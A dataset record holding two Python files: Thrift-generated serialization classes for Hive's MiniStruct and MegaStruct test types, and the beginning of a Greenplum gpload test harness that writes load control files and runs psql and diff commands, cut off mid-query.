max_stars_repo_path (string, 3-269) | max_stars_repo_name (string, 4-119) | max_stars_count (int64, 0-191k) | id (string, 1-7) | content (string, 6-1.05M) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
---|---|---|---|---|---|---|
serde/src/gen/thrift/gen-py/megastruct/ttypes.py | amCharlie/hive | 2 | 1100 | <filename>serde/src/gen/thrift/gen-py/megastruct/ttypes.py
#
# Autogenerated by Thrift Compiler (0.13.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
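# For orientation (not part of the generated header): a module like this is what
# the Thrift compiler emits for the Python target, e.g. roughly
#   thrift --gen py megastruct.thrift
# where the IDL filename (megastruct.thrift) is an assumption based on the
# package name.
#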
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
from thrift.transport import TTransport
all_structs = []
class MyEnum(object):
LLAMA = 1
ALPACA = 2
_VALUES_TO_NAMES = {
1: "LLAMA",
2: "ALPACA",
}
_NAMES_TO_VALUES = {
"LLAMA": 1,
"ALPACA": 2,
}
class MiniStruct(object):
"""
Attributes:
- my_string
- my_enum
"""
def __init__(self, my_string=None, my_enum=None,):
self.my_string = my_string
self.my_enum = my_enum
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.my_string = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.my_enum = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('MiniStruct')
if self.my_string is not None:
oprot.writeFieldBegin('my_string', TType.STRING, 1)
oprot.writeString(self.my_string.encode('utf-8') if sys.version_info[0] == 2 else self.my_string)
oprot.writeFieldEnd()
if self.my_enum is not None:
oprot.writeFieldBegin('my_enum', TType.I32, 2)
oprot.writeI32(self.my_enum)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MegaStruct(object):
"""
Attributes:
- my_bool
- my_byte
- my_16bit_int
- my_32bit_int
- my_64bit_int
- my_double
- my_string
- my_binary
- my_string_string_map
- my_string_enum_map
- my_enum_string_map
- my_enum_struct_map
- my_enum_stringlist_map
- my_enum_structlist_map
- my_stringlist
- my_structlist
- my_enumlist
- my_stringset
- my_enumset
- my_structset
"""
def __init__(self, my_bool=None, my_byte=None, my_16bit_int=None, my_32bit_int=None, my_64bit_int=None, my_double=None, my_string=None, my_binary=None, my_string_string_map=None, my_string_enum_map=None, my_enum_string_map=None, my_enum_struct_map=None, my_enum_stringlist_map=None, my_enum_structlist_map=None, my_stringlist=None, my_structlist=None, my_enumlist=None, my_stringset=None, my_enumset=None, my_structset=None,):
self.my_bool = my_bool
self.my_byte = my_byte
self.my_16bit_int = my_16bit_int
self.my_32bit_int = my_32bit_int
self.my_64bit_int = my_64bit_int
self.my_double = my_double
self.my_string = my_string
self.my_binary = my_binary
self.my_string_string_map = my_string_string_map
self.my_string_enum_map = my_string_enum_map
self.my_enum_string_map = my_enum_string_map
self.my_enum_struct_map = my_enum_struct_map
self.my_enum_stringlist_map = my_enum_stringlist_map
self.my_enum_structlist_map = my_enum_structlist_map
self.my_stringlist = my_stringlist
self.my_structlist = my_structlist
self.my_enumlist = my_enumlist
self.my_stringset = my_stringset
self.my_enumset = my_enumset
self.my_structset = my_structset
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.my_bool = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BYTE:
self.my_byte = iprot.readByte()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I16:
self.my_16bit_int = iprot.readI16()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.my_32bit_int = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.my_64bit_int = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.my_double = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.my_string = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.my_binary = iprot.readBinary()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.MAP:
self.my_string_string_map = {}
(_ktype1, _vtype2, _size0) = iprot.readMapBegin()
for _i4 in range(_size0):
_key5 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val6 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_string_string_map[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.MAP:
self.my_string_enum_map = {}
(_ktype8, _vtype9, _size7) = iprot.readMapBegin()
for _i11 in range(_size7):
_key12 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val13 = iprot.readI32()
self.my_string_enum_map[_key12] = _val13
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.MAP:
self.my_enum_string_map = {}
(_ktype15, _vtype16, _size14) = iprot.readMapBegin()
for _i18 in range(_size14):
_key19 = iprot.readI32()
_val20 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_enum_string_map[_key19] = _val20
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.MAP:
self.my_enum_struct_map = {}
(_ktype22, _vtype23, _size21) = iprot.readMapBegin()
for _i25 in range(_size21):
_key26 = iprot.readI32()
_val27 = MiniStruct()
_val27.read(iprot)
self.my_enum_struct_map[_key26] = _val27
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.MAP:
self.my_enum_stringlist_map = {}
(_ktype29, _vtype30, _size28) = iprot.readMapBegin()
for _i32 in range(_size28):
_key33 = iprot.readI32()
_val34 = []
(_etype38, _size35) = iprot.readListBegin()
for _i39 in range(_size35):
_elem40 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val34.append(_elem40)
iprot.readListEnd()
self.my_enum_stringlist_map[_key33] = _val34
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.MAP:
self.my_enum_structlist_map = {}
(_ktype42, _vtype43, _size41) = iprot.readMapBegin()
for _i45 in range(_size41):
_key46 = iprot.readI32()
_val47 = []
(_etype51, _size48) = iprot.readListBegin()
for _i52 in range(_size48):
_elem53 = MiniStruct()
_elem53.read(iprot)
_val47.append(_elem53)
iprot.readListEnd()
self.my_enum_structlist_map[_key46] = _val47
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.LIST:
self.my_stringlist = []
(_etype57, _size54) = iprot.readListBegin()
for _i58 in range(_size54):
_elem59 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_stringlist.append(_elem59)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.LIST:
self.my_structlist = []
(_etype63, _size60) = iprot.readListBegin()
for _i64 in range(_size60):
_elem65 = MiniStruct()
_elem65.read(iprot)
self.my_structlist.append(_elem65)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.LIST:
self.my_enumlist = []
(_etype69, _size66) = iprot.readListBegin()
for _i70 in range(_size66):
_elem71 = iprot.readI32()
self.my_enumlist.append(_elem71)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.SET:
self.my_stringset = set()
(_etype75, _size72) = iprot.readSetBegin()
for _i76 in range(_size72):
_elem77 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.my_stringset.add(_elem77)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.SET:
self.my_enumset = set()
(_etype81, _size78) = iprot.readSetBegin()
for _i82 in range(_size78):
_elem83 = iprot.readI32()
self.my_enumset.add(_elem83)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.SET:
self.my_structset = set()
(_etype87, _size84) = iprot.readSetBegin()
for _i88 in range(_size84):
_elem89 = MiniStruct()
_elem89.read(iprot)
self.my_structset.add(_elem89)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('MegaStruct')
if self.my_bool is not None:
oprot.writeFieldBegin('my_bool', TType.BOOL, 1)
oprot.writeBool(self.my_bool)
oprot.writeFieldEnd()
if self.my_byte is not None:
oprot.writeFieldBegin('my_byte', TType.BYTE, 2)
oprot.writeByte(self.my_byte)
oprot.writeFieldEnd()
if self.my_16bit_int is not None:
oprot.writeFieldBegin('my_16bit_int', TType.I16, 3)
oprot.writeI16(self.my_16bit_int)
oprot.writeFieldEnd()
if self.my_32bit_int is not None:
oprot.writeFieldBegin('my_32bit_int', TType.I32, 4)
oprot.writeI32(self.my_32bit_int)
oprot.writeFieldEnd()
if self.my_64bit_int is not None:
oprot.writeFieldBegin('my_64bit_int', TType.I64, 5)
oprot.writeI64(self.my_64bit_int)
oprot.writeFieldEnd()
if self.my_double is not None:
oprot.writeFieldBegin('my_double', TType.DOUBLE, 6)
oprot.writeDouble(self.my_double)
oprot.writeFieldEnd()
if self.my_string is not None:
oprot.writeFieldBegin('my_string', TType.STRING, 7)
oprot.writeString(self.my_string.encode('utf-8') if sys.version_info[0] == 2 else self.my_string)
oprot.writeFieldEnd()
if self.my_binary is not None:
oprot.writeFieldBegin('my_binary', TType.STRING, 8)
oprot.writeBinary(self.my_binary)
oprot.writeFieldEnd()
if self.my_string_string_map is not None:
oprot.writeFieldBegin('my_string_string_map', TType.MAP, 9)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.my_string_string_map))
for kiter90, viter91 in self.my_string_string_map.items():
oprot.writeString(kiter90.encode('utf-8') if sys.version_info[0] == 2 else kiter90)
oprot.writeString(viter91.encode('utf-8') if sys.version_info[0] == 2 else viter91)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_string_enum_map is not None:
oprot.writeFieldBegin('my_string_enum_map', TType.MAP, 10)
oprot.writeMapBegin(TType.STRING, TType.I32, len(self.my_string_enum_map))
for kiter92, viter93 in self.my_string_enum_map.items():
oprot.writeString(kiter92.encode('utf-8') if sys.version_info[0] == 2 else kiter92)
oprot.writeI32(viter93)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_string_map is not None:
oprot.writeFieldBegin('my_enum_string_map', TType.MAP, 11)
oprot.writeMapBegin(TType.I32, TType.STRING, len(self.my_enum_string_map))
for kiter94, viter95 in self.my_enum_string_map.items():
oprot.writeI32(kiter94)
oprot.writeString(viter95.encode('utf-8') if sys.version_info[0] == 2 else viter95)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_struct_map is not None:
oprot.writeFieldBegin('my_enum_struct_map', TType.MAP, 12)
oprot.writeMapBegin(TType.I32, TType.STRUCT, len(self.my_enum_struct_map))
for kiter96, viter97 in self.my_enum_struct_map.items():
oprot.writeI32(kiter96)
viter97.write(oprot)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_stringlist_map is not None:
oprot.writeFieldBegin('my_enum_stringlist_map', TType.MAP, 13)
oprot.writeMapBegin(TType.I32, TType.LIST, len(self.my_enum_stringlist_map))
for kiter98, viter99 in self.my_enum_stringlist_map.items():
oprot.writeI32(kiter98)
oprot.writeListBegin(TType.STRING, len(viter99))
for iter100 in viter99:
oprot.writeString(iter100.encode('utf-8') if sys.version_info[0] == 2 else iter100)
oprot.writeListEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_enum_structlist_map is not None:
oprot.writeFieldBegin('my_enum_structlist_map', TType.MAP, 14)
oprot.writeMapBegin(TType.I32, TType.LIST, len(self.my_enum_structlist_map))
for kiter101, viter102 in self.my_enum_structlist_map.items():
oprot.writeI32(kiter101)
oprot.writeListBegin(TType.STRUCT, len(viter102))
for iter103 in viter102:
iter103.write(oprot)
oprot.writeListEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.my_stringlist is not None:
oprot.writeFieldBegin('my_stringlist', TType.LIST, 15)
oprot.writeListBegin(TType.STRING, len(self.my_stringlist))
for iter104 in self.my_stringlist:
oprot.writeString(iter104.encode('utf-8') if sys.version_info[0] == 2 else iter104)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.my_structlist is not None:
oprot.writeFieldBegin('my_structlist', TType.LIST, 16)
oprot.writeListBegin(TType.STRUCT, len(self.my_structlist))
for iter105 in self.my_structlist:
iter105.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.my_enumlist is not None:
oprot.writeFieldBegin('my_enumlist', TType.LIST, 17)
oprot.writeListBegin(TType.I32, len(self.my_enumlist))
for iter106 in self.my_enumlist:
oprot.writeI32(iter106)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.my_stringset is not None:
oprot.writeFieldBegin('my_stringset', TType.SET, 18)
oprot.writeSetBegin(TType.STRING, len(self.my_stringset))
for iter107 in self.my_stringset:
oprot.writeString(iter107.encode('utf-8') if sys.version_info[0] == 2 else iter107)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.my_enumset is not None:
oprot.writeFieldBegin('my_enumset', TType.SET, 19)
oprot.writeSetBegin(TType.I32, len(self.my_enumset))
for iter108 in self.my_enumset:
oprot.writeI32(iter108)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.my_structset is not None:
oprot.writeFieldBegin('my_structset', TType.SET, 20)
oprot.writeSetBegin(TType.STRUCT, len(self.my_structset))
for iter109 in self.my_structset:
iter109.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(MiniStruct)
MiniStruct.thrift_spec = (
None, # 0
(1, TType.STRING, 'my_string', 'UTF8', None, ), # 1
(2, TType.I32, 'my_enum', None, None, ), # 2
)
all_structs.append(MegaStruct)
MegaStruct.thrift_spec = (
None, # 0
(1, TType.BOOL, 'my_bool', None, None, ), # 1
(2, TType.BYTE, 'my_byte', None, None, ), # 2
(3, TType.I16, 'my_16bit_int', None, None, ), # 3
(4, TType.I32, 'my_32bit_int', None, None, ), # 4
(5, TType.I64, 'my_64bit_int', None, None, ), # 5
(6, TType.DOUBLE, 'my_double', None, None, ), # 6
(7, TType.STRING, 'my_string', 'UTF8', None, ), # 7
(8, TType.STRING, 'my_binary', 'BINARY', None, ), # 8
(9, TType.MAP, 'my_string_string_map', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 9
(10, TType.MAP, 'my_string_enum_map', (TType.STRING, 'UTF8', TType.I32, None, False), None, ), # 10
(11, TType.MAP, 'my_enum_string_map', (TType.I32, None, TType.STRING, 'UTF8', False), None, ), # 11
(12, TType.MAP, 'my_enum_struct_map', (TType.I32, None, TType.STRUCT, [MiniStruct, None], False), None, ), # 12
(13, TType.MAP, 'my_enum_stringlist_map', (TType.I32, None, TType.LIST, (TType.STRING, 'UTF8', False), False), None, ), # 13
(14, TType.MAP, 'my_enum_structlist_map', (TType.I32, None, TType.LIST, (TType.STRUCT, [MiniStruct, None], False), False), None, ), # 14
(15, TType.LIST, 'my_stringlist', (TType.STRING, 'UTF8', False), None, ), # 15
(16, TType.LIST, 'my_structlist', (TType.STRUCT, [MiniStruct, None], False), None, ), # 16
(17, TType.LIST, 'my_enumlist', (TType.I32, None, False), None, ), # 17
(18, TType.SET, 'my_stringset', (TType.STRING, 'UTF8', False), None, ), # 18
(19, TType.SET, 'my_enumset', (TType.I32, None, False), None, ), # 19
(20, TType.SET, 'my_structset', (TType.STRUCT, [MiniStruct, None], False), None, ), # 20
)
fix_spec(all_structs)
del all_structs
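# Illustrative usage sketch (not produced by the Thrift code generator): round-trip
# a MiniStruct through the stock binary protocol. Assumes the standard Apache
# Thrift Python runtime; only TBinaryProtocol is imported beyond what the module
# already uses.
from thrift.protocol import TBinaryProtocol


def _example_roundtrip():
    # Serialize into an in-memory transport.
    write_buf = TTransport.TMemoryBuffer()
    MiniStruct(my_string='hello', my_enum=MyEnum.LLAMA).write(
        TBinaryProtocol.TBinaryProtocol(write_buf))
    # Deserialize from the captured bytes and confirm the fields survived.
    decoded = MiniStruct()
    decoded.read(TBinaryProtocol.TBinaryProtocol(
        TTransport.TMemoryBuffer(write_buf.getvalue())))
    assert decoded.my_string == 'hello'
    assert decoded.my_enum == MyEnum.LLAMA
    return decoded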
| 1.992188 | 2 |
gpMgmt/bin/gpload_test/gpload2/TEST.py | Tylarb/gpdb | 1 | 1101 | <gh_stars>1-10
#!/usr/bin/env python
import unittest
import sys
import os
import string
import time
import socket
import fileinput
import platform
import re
try:
import subprocess32 as subprocess
except:
import subprocess
import pg
def get_port_from_conf():
file = os.environ.get('MASTER_DATA_DIRECTORY')+'/postgresql.conf'
if os.path.isfile(file):
with open(file) as f:
for line in f.xreadlines():
match = re.search('port=\d+',line)
if match:
match1 = re.search('\d+', match.group())
if match1:
return match1.group()
def get_port():
port = os.environ['PGPORT']
if not port:
port = get_port_from_conf()
return port if port else 5432
def get_ip(hostname=None):
if hostname is None:
hostname = socket.gethostname()
else:
hostname = hostname
hostinfo = socket.getaddrinfo(hostname, None)
ipaddrlist = list(set([(ai[4][0]) for ai in hostinfo]))
for myip in ipaddrlist:
if myip.find(":") > 0:
ipv6 = myip
return ipv6
elif myip.find(".") > 0:
ipv4 = myip
return ipv4
def getPortMasterOnly(host = 'localhost',master_value = None,
user = os.environ.get('USER'),gphome = os.environ['GPHOME'],
mdd=os.environ['MASTER_DATA_DIRECTORY'],port = os.environ['PGPORT']):
master_pattern = "Context:\s*-1\s*Value:\s*\d+"
command = "gpconfig -s %s" % ( "port" )
cmd = "source %s/greenplum_path.sh; export MASTER_DATA_DIRECTORY=%s; export PGPORT=%s; %s" \
% (gphome, mdd, port, command)
(ok,out) = run(cmd)
if not ok:
raise Exception("Unable to connect to segment server %s as user %s" % (host, user))
for line in out:
out = line.split('\n')
for line in out:
if re.search(master_pattern, line):
master_value = int(line.split()[3].strip())
if master_value is None:
error_msg = "".join(out)
raise Exception(error_msg)
return str(master_value)
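# Note (illustrative): the regex above keys on a line of `gpconfig -s port` output
# shaped roughly like
#   Context: -1 Value: 5432
# and the fourth whitespace-separated token (5432 here) is taken as the master port.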
"""
Global Values
"""
MYD = os.path.abspath(os.path.dirname(__file__))
mkpath = lambda *x: os.path.join(MYD, *x)
UPD = os.path.abspath(mkpath('..'))
if UPD not in sys.path:
sys.path.append(UPD)
DBNAME = "postgres"
USER = os.environ.get( "LOGNAME" )
HOST = socket.gethostname()
GPHOME = os.getenv("GPHOME")
PGPORT = get_port()
PGUSER = os.environ.get("PGUSER")
if PGUSER is None:
PGUSER = USER
PGHOST = os.environ.get("PGHOST")
if PGHOST is None:
PGHOST = HOST
d = mkpath('config')
if not os.path.exists(d):
os.mkdir(d)
def write_config_file(mode='insert', reuse_flag='',columns_flag='0',mapping='0',portNum='8081',database='reuse_gptest',host='localhost',formatOpts='text',file='data/external_file_01.txt',table='texttable',format='text',delimiter="'|'",escape='',quote='',truncate='False',log_errors=None, error_limit='0',error_table=None,externalSchema=None,staging_table=None,fast_match='false', encoding=None, preload=True, fill=False):
f = open(mkpath('config/config_file'),'w')
f.write("VERSION: 1.0.0.1")
if database:
f.write("\nDATABASE: "+database)
f.write("\nUSER: "+os.environ.get('USER'))
f.write("\nHOST: "+hostNameAddrs)
f.write("\nPORT: "+masterPort)
f.write("\nGPLOAD:")
f.write("\n INPUT:")
f.write("\n - SOURCE:")
f.write("\n LOCAL_HOSTNAME:")
f.write("\n - "+hostNameAddrs)
if portNum:
f.write("\n PORT: "+portNum)
f.write("\n FILE:")
f.write("\n - "+mkpath(file))
if columns_flag=='1':
f.write("\n - COLUMNS:")
f.write("\n - s_s1: text")
f.write("\n - s_s2: text")
f.write("\n - s_dt: timestamp")
f.write("\n - s_s3: text")
f.write("\n - s_n1: smallint")
f.write("\n - s_n2: integer")
f.write("\n - s_n3: bigint")
f.write("\n - s_n4: decimal")
f.write("\n - s_n5: numeric")
f.write("\n - s_n6: real")
f.write("\n - s_n7: double precision")
f.write("\n - s_n8: text")
f.write("\n - s_n9: text")
if format:
f.write("\n - FORMAT: "+format)
if log_errors:
f.write("\n - LOG_ERRORS: true")
f.write("\n - ERROR_LIMIT: " + error_limit)
if error_table:
f.write("\n - ERROR_TABLE: " + error_table)
f.write("\n - ERROR_LIMIT: " + error_limit)
if delimiter:
f.write("\n - DELIMITER: "+delimiter)
if encoding:
f.write("\n - ENCODING: "+encoding)
if escape:
f.write("\n - ESCAPE: "+escape)
if quote:
f.write("\n - QUOTE: "+quote)
if fill:
f.write("\n - FILL_MISSING_FIELDS: true")
f.write("\n OUTPUT:")
f.write("\n - TABLE: "+table)
if mode:
if mode == 'insert':
f.write("\n - MODE: "+'insert')
if mode == 'update':
f.write("\n - MODE: "+'update')
if mode == 'merge':
f.write("\n - MODE: "+'merge')
f.write("\n - UPDATE_COLUMNS:")
f.write("\n - n2")
f.write("\n - MATCH_COLUMNS:")
f.write("\n - n1")
f.write("\n - s1")
f.write("\n - s2")
if mapping=='1':
f.write("\n - MAPPING:")
f.write("\n s1: s_s1")
f.write("\n s2: s_s2")
f.write("\n dt: s_dt")
f.write("\n s3: s_s3")
f.write("\n n1: s_n1")
f.write("\n n2: s_n2")
f.write("\n n3: s_n3")
f.write("\n n4: s_n4")
f.write("\n n5: s_n5")
f.write("\n n6: s_n6")
f.write("\n n7: s_n7")
f.write("\n n8: s_n8")
f.write("\n n9: s_n9")
if externalSchema:
f.write("\n EXTERNAL:")
f.write("\n - SCHEMA: "+externalSchema)
if preload:
f.write("\n PRELOAD:")
f.write("\n - REUSE_TABLES: "+reuse_flag)
f.write("\n - FAST_MATCH: "+fast_match)
if staging_table:
f.write("\n - STAGING_TABLE: "+staging_table)
f.write("\n")
f.close()
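# For orientation, a hand-written sketch (not captured from a real run) of the
# control file produced by a typical call such as
# write_config_file(mode='insert', reuse_flag='true') with the remaining defaults;
# hostname, port and paths below are placeholder values and the indentation is
# approximate:
#
#   VERSION: 1.0.0.1
#   DATABASE: reuse_gptest
#   USER: gpadmin
#   HOST: 192.168.0.10
#   PORT: 5432
#   GPLOAD:
#     INPUT:
#       - SOURCE:
#           LOCAL_HOSTNAME:
#             - 192.168.0.10
#           PORT: 8081
#           FILE:
#             - /path/to/gpload2/data/external_file_01.txt
#       - FORMAT: text
#       - DELIMITER: '|'
#     OUTPUT:
#       - TABLE: texttable
#       - MODE: insert
#     PRELOAD:
#       - REUSE_TABLES: true
#       - FAST_MATCH: false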
def runfile(ifile, flag='', dbname=None, outputPath="", outputFile="",
username=None,
PGOPTIONS=None, host = None, port = None):
if len(outputFile) == 0:
(ok, out) = psql_run(ifile = ifile,ofile = outFile(ifile, outputPath),flag = flag,
dbname=dbname , username=username,
PGOPTIONS=PGOPTIONS, host = host, port = port)
else:
(ok,out) = psql_run(ifile =ifile, ofile =outFile(outputFile, outputPath), flag =flag,
dbname= dbname, username= username,
PGOPTIONS= PGOPTIONS, host = host, port = port)
return (ok, out)
def psql_run(ifile = None, ofile = None, cmd = None,
flag = '-e',dbname = None,
username = None,
PGOPTIONS = None, host = None, port = None):
'''
Run a command or file against psql. Return True if OK.
@param dbname: database name
@param ifile: input file
@param cmd: command line
@param flag: -e Run SQL with no comments (default)
-a Run SQL with comments and psql notice
@param username: psql user
@param host : to connect to a different host
@param port : port where gpdb is running
@param PGOPTIONS: connects to postgres via utility mode
'''
if dbname is None:
dbname = DBNAME
if username is None:
username = PGUSER # Use the default login user
if PGOPTIONS is None:
PGOPTIONS = ""
else:
PGOPTIONS = "PGOPTIONS='%s'" % PGOPTIONS
if host is None:
host = "-h %s" % PGHOST
else:
host = "-h %s" % host
if port is None:
port = ""
else:
port = "-p %s" % port
if cmd:
arg = '-c "%s"' % cmd
elif ifile:
arg = ' < ' + ifile
if not (flag == '-q'): # Don't echo commands sent to server
arg = '-e < ' + ifile
if flag == '-a':
arg = '-f ' + ifile
else:
raise PSQLError('missing cmd and ifile')
if ofile == '-':
ofile = '2>&1'
elif not ofile:
ofile = '> /dev/null 2>&1'
else:
ofile = '> %s 2>&1' % ofile
return run('%s psql -d %s %s %s -U %s %s %s %s' %
(PGOPTIONS, dbname, host, port, username, flag, arg, ofile))
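# Illustrative usage of the helper above: run one statement against the default
# database and keep the combined output in the returned list instead of a file
# (ofile='-' redirects stderr into the captured stdout).
#   (ok, out) = psql_run(cmd="select version();", dbname='postgres', ofile='-')
#   if not ok:
#       raise PSQLError("psql failed: %s" % out)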
def run(cmd):
"""
Run a shell command. Return (True, [result]) if OK, or (False, []) otherwise.
@params cmd: The command to run at the shell.
oFile: an optional output file.
mode: What to do if the output file already exists: 'a' = append;
'w' = write. Defaults to append (so that the function is
backwards compatible). Yes, this is passed to the open()
function, so you can theoretically pass any value that is
valid for the second parameter of open().
"""
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = p.communicate()[0]
ret = []
ret.append(out)
rc = False if p.wait() else True
return (rc,ret)
def outFile(fname,outputPath = ''):
return changeExtFile(fname, ".out", outputPath)
def diffFile( fname, outputPath = "" ):
return changeExtFile( fname, ".diff", outputPath )
def changeExtFile( fname, ext = ".diff", outputPath = "" ):
if len( outputPath ) == 0:
return os.path.splitext( fname )[0] + ext
else:
filename = fname.split( "/" )
fname = os.path.splitext( filename[len( filename ) - 1] )[0]
return outputPath + "/" + fname + ext
def gpdbAnsFile(fname):
ext = '.ans'
return os.path.splitext(fname)[0] + ext
def isFileEqual( f1, f2, optionalFlags = "", outputPath = "", myinitfile = ""):
LMYD = os.path.abspath(os.path.dirname(__file__))
if not os.access( f1, os.R_OK ):
raise Exception( 'Error: cannot find file %s' % f1 )
if not os.access( f2, os.R_OK ):
raise Exception( 'Error: cannot find file %s' % f2 )
dfile = diffFile( f1, outputPath = outputPath )
# Gets the suitePath name to add init_file
suitePath = f1[0:f1.rindex( "/" )]
if os.path.exists(suitePath + "/init_file"):
(ok, out) = run('../gpdiff.pl -w ' + optionalFlags + \
' -I NOTICE: -I HINT: -I CONTEXT: -I GP_IGNORE: --gp_init_file=%s/global_init_file --gp_init_file=%s/init_file '
'%s %s > %s 2>&1' % (LMYD, suitePath, f1, f2, dfile))
else:
if os.path.exists(myinitfile):
(ok, out) = run('../gpdiff.pl -w ' + optionalFlags + \
' -I NOTICE: -I HINT: -I CONTEXT: -I GP_IGNORE: --gp_init_file=%s/global_init_file --gp_init_file=%s '
'%s %s > %s 2>&1' % (LMYD, myinitfile, f1, f2, dfile))
else:
(ok, out) = run( '../gpdiff.pl -w ' + optionalFlags + \
' -I NOTICE: -I HINT: -I CONTEXT: -I GP_IGNORE: --gp_init_file=%s/global_init_file '
'%s %s > %s 2>&1' % ( LMYD, f1, f2, dfile ) )
if ok:
os.unlink( dfile )
return ok
def read_diff(ifile, outputPath):
"""
Opens the diff file that is associated with the given input file and returns
its contents as a string.
"""
dfile = diffFile(ifile, outputPath)
with open(dfile, 'r') as diff:
return diff.read()
def modify_sql_file(num):
file = mkpath('query%d.sql' % num)
user = os.environ.get('USER')
if not user:
user = os.environ.get('LOGNAME')  # fall back to LOGNAME when USER is unset
if os.path.isfile(file):
for line in fileinput.FileInput(file,inplace=1):
line = line.replace("gpload.py ","gpload ")
print str(re.sub('\n','',line))
def copy_data(source='',target=''):
cmd = 'cp '+ mkpath('data/' + source) + ' ' + mkpath(target)
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
return p.communicate()
hostNameAddrs = get_ip(HOST)
masterPort = getPortMasterOnly()
def get_table_name():
try:
db = pg.DB(dbname='reuse_gptest'
,host='localhost'
,port=int(PGPORT)
)
except Exception,e:
errorMessage = str(e)
print 'could not connect to database: ' + errorMessage
queryString = """SELECT relname
from pg_class
WHERE relname
